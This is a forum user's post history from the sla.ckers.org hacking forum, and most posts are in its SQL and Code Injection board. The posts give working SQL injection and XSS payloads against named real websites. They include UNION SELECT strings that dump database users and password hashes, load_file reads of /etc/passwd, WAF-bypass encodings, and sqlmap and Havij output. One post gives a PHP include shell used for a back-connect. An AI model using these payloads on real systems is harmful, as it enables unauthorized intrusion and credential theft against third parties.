Sla.ckers.org
How robots and spiders are causing issues, how to stop them. We can also talk about Completely Automated Public Turing Test To Tell Computers And Humans Apart - their use, their compliance issues, porn proxies, PWNtcha and other ways to defeat them. 

Current Page: 1 of 5
Results 1 - 30 of 131
1 year ago
VMw4r3
http://goo.gl/Xpc3D
Forum: SQL and Code Injection
1 year ago
VMw4r3
xss http://continue.austincc.edu/catalog/courses.php?term=212UCE&name=%22/%3E%3Cscript%3Ealert%281%29;%3C/script%3EPHP&topic=PHP
Forum: SQL and Code Injection
1 year ago
VMw4r3
It works with sqlmap v8. http://continue.austincc.edu/index/view.php?id=62211 [16:32:31] retrieved: nformation_schema [16:38:05] retrieved: ce [16:38:51] retrieved: mysql [16:40:20] retrieved: phpmyadmin [16:42:43] retrieved: wordpress available databases [5]: [*] ce [*] information_schema [*] mysql [*] phpmyadmin [*] wordpress [17:15:47] retrieved: an-sys-maint'@'l
Forum: SQL and Code Injection
1 year ago
VMw4r3
%oaUnIon%oa20all%20%oaSelect%oa gets past the WAF but still can't find injection.
Forum: SQL and Code Injection
1 year ago
VMw4r3
You can use union with havij. Analyzing http://www.southernct.edu/search/directories/profile/?id=48952 Positive pattern generated Host IP: 149.152.64.11 Web Server: Apache/2.2.13 (Unix) mod_ssl/2.2.13 OpenSSL/0.9.8l PHP/5.2.9 Powered-by: PHP/5.2.9 Keyword Found I guess injection type is Integer?! Can't find db server type! But maybe there be some chances! [-o< Selected Column Count i
Forum: SQL and Code Injection
1 year ago
VMw4r3
Try using GROUP BY instead of ORDER.
Forum: SQL and Code Injection
2 years ago
VMw4r3
It's mysql V3. ?id=28357 and substring(@@version,1,1)=3 <-- true
Forum: SQL and Code Injection
2 years ago
VMw4r3
124 and 1=2 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,concat_ws(0x3a,user,password,host),14,15 from mysql.user root:595bbf94168ab731:localhost 595bbf94168ab731:ji9olk ?id=124 and 1=2 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,load_file(0x2F6574632F706173737764),14,15
Forum: SQL and Code Injection
2 years ago
VMw4r3
http://www.androians.com/mirach/news/news.php?idx=580 and 4=5 union all select 1,2,concat_ws(0x3a,user(),database(),@@version),4-- - eventuser@eventweb2:iskydb:5.1.45-community Visible in the page source code. A quick way to check which column is visible is to hex-encode XSS and check for an alert when no columns are visible on the page. http://www.androians.com/mirach/news/news.php?idx=580 an
Forum: SQL and Code Injection
2 years ago
VMw4r3
There's no filter! php?id=19+AND+1=2+UNION+SELECT+1,concat_ws(0x3a,user(),database(),@@version),3,user(),5,6,7--
Forum: SQL and Code Injection
2 years ago
VMw4r3
LulzSec Leader Was Snitch Who Helped Snag Fellow Hackers Quote: A top LulzSec leader turned informant after he was secretly arrested last year and then provided information to law enforcement which resulted in the arrest on two continents Tuesday of other top members of the hacking group, including one of the alleged leaders of the Stratfor hack, according to a news report. Hector Xavier Monse
Forum: OMG Ponies
2 years ago
VMw4r3
http://www.newsarama.com/php/multimedia/album_view.php?gid=-1358/**//*!union*//**/all/**//*!select*//**/version(),2-- 5.0.45-log http://www.newsarama.com/php/multimedia/album_view.php?gid=-1358/**//*!union*//**/all/**//*!select*//**/table_name,2/**/From/**/Information_Schema%20.%20Tables%20limit%2032,1--
Forum: SQL and Code Injection
2 years ago
VMw4r3
johndoe Wrote:
-------------------------------------------------------
> if you recall the filter it for me post I
> commented in I found the phpinfo file using linux
> terminal, I'd like to know how can I upload it
> here, also I found sql injections in
> memberlist.php and groupcp.php

lol johndoe you keep hijacking other people's threads. Try using the "New Topi
Forum: SQL and Code Injection
2 years ago
VMw4r3
johndoe Wrote:
-------------------------------------------------------
> www.globovision.com I just found via burp proxy,
> not firefox, that by adding single quote in some
> pages it gives sql errors..
>
> http://www.globovision.com/channel.php? is an
> example..
>
> where do I go afterwards from here?

I think you need to start at the beginning and learn the b
Forum: SQL and Code Injection
2 years ago
VMw4r3
GOOGLE havij
Forum: SQL and Code Injection
2 years ago
VMw4r3
http://pastebin.com/3jWkk0bX
Forum: SQL and Code Injection
2 years ago
VMw4r3
There's a similar issue with the fb app on the iPhone. Occasionally my daughter would use my iPhone to log in to her fb, but when she logs out and I logged back in I was getting my fb mail and chat but the home page (status updates) was still logged in as her. I haven't tried it in a few months since the old app layout.
Forum: Privacy
2 years ago
VMw4r3
Whitespaces %20 %09 %0a %0b %0c %0d %a0 /**/ ‘or+(1)sounds/**/like“1“–%a0- ‘union(select(1),tabe_name,(3)from`information_schema`.`tables`)#
Forum: SQL and Code Injection
3 years ago
VMw4r3
http://www.eegmusic.com/artist/album.php/view/211/54761 and 9=4 union all select 1,concat_ws(0x3a,user,password,host),3,4,5,6 from mysql.user limit 0,1-- - http://www.eegmusic.com/artist/album.php/view/211/547 and 9=4 union all select 1,load_file(0x2F6574632F706173737764),3,4,5,6-- - *edit http://www.eegmusic.com/artist/album.php/view/211/547 and 9=4 union all select 1,unhex(hex(concat_ws
Forum: SQL and Code Injection
3 years ago
VMw4r3
U.S. Gov Seeks Longer Prison Sentences for Criminal Hackers: Quote: Criminal and black hat hackers beware - If the U.S. government finds you, it is not going to be lenient. The stakes are rising in the world of cybersecurity and the Obama administration is not taking it lightly. The White House has proposed to Congress an increase in maximum jail time for criminal hackers whose acts are "
Forum: News and Links
3 years ago
VMw4r3
XSS exists too. http://sla.ckers.org/forum/read.php?3,44,36319#msg-36319
Forum: Robots/Spiders/CAPTCHAs, oh my
3 years ago
VMw4r3
Use blind sqli.
Forum: SQL and Code Injection
3 years ago
VMw4r3
It's MSsql. http://www.betalebanon.org/n_news.asp?news_id=convert(int,db_name()) and 1=1
Forum: SQL and Code Injection
3 years ago
VMw4r3
http://justplaingeek.com/blog/wp-content/plugins/si-contact-form/captcha-secureimage/test/index.php/"/><script>alert(document.cookie)</script> http://justplaingeek.com/blog/wp-content/plugins/si-contact-form/captcha-secureimage/test/index.php/"/><script>alert(document.cookie)</script> http://blogs.ischool.utexas.edu/wp-content/plugins/si-contact-form/c
Forum: Full Disclosure
3 years ago
VMw4r3
http://www.toshiba.com/ind/searchresult.jsp?scontains=<script>alert(document.cookie);</script> &x=0&y=0&item=product This one only works with "<H1>XSS</H1>" tags in it ? http://www.csd.toshiba.com/cgi-bin/tais/support/jsp/outFrm.jsp?ofId=AskIris&searchString=<SCRIPT>alert(document.cookie)</SCRIPT><H1>XSS</H1>&x=0
Forum: Full Disclosure
3 years ago
VMw4r3
For backconnect I'd normally use: ZoRBaCK Connect Back Shell: Or upload <?php include("$_GET"); ?> And connect using fimap.
Forum: Obfuscation
3 years ago
VMw4r3
http://niemannross.host.adobe.com/2010csbuDeveloperSummit/mobile/byday.php?summitDate=1" and 3=5 union all select 1,concat_ws(0x3a,user(),database(),@@version,@@datadir),3,4,5,6,7,8,9,10,11,12,13,14,15,16 AND "x"="x http://niemannross.host.adobe.com/2010csbuDeveloperSummit/mobile/byday.php?summitDate=1" and 3=5 union all select 1,unhex(hex(concat_ws(0x3a,user_login,user
Forum: SQL and Code Injection
3 years ago
VMw4r3
There's an XSS on the site. http://vpn.rminfraestrutura.com.br//intranet/painel/lib/classes/dompdf/www/examples.php/"</script><script>alert(document.cookie) </script> http://vpn.rminfraestrutura.com.br/intranet/painel/lib/classes/fckeditor/editor/filemanager/browser/default/figuras.php/1<ScRiPt>alert(document.cookie)</ScRiPt>
Forum: SQL and Code Injection
3 years ago
VMw4r3
Download the login script and see what method is being used to encrypt/encode the DBConnection file.
Forum: SQL and Code Injection
3 years ago
VMw4r3
Why do you want to bypass the filter when there's no injection?
Forum: SQL and Code Injection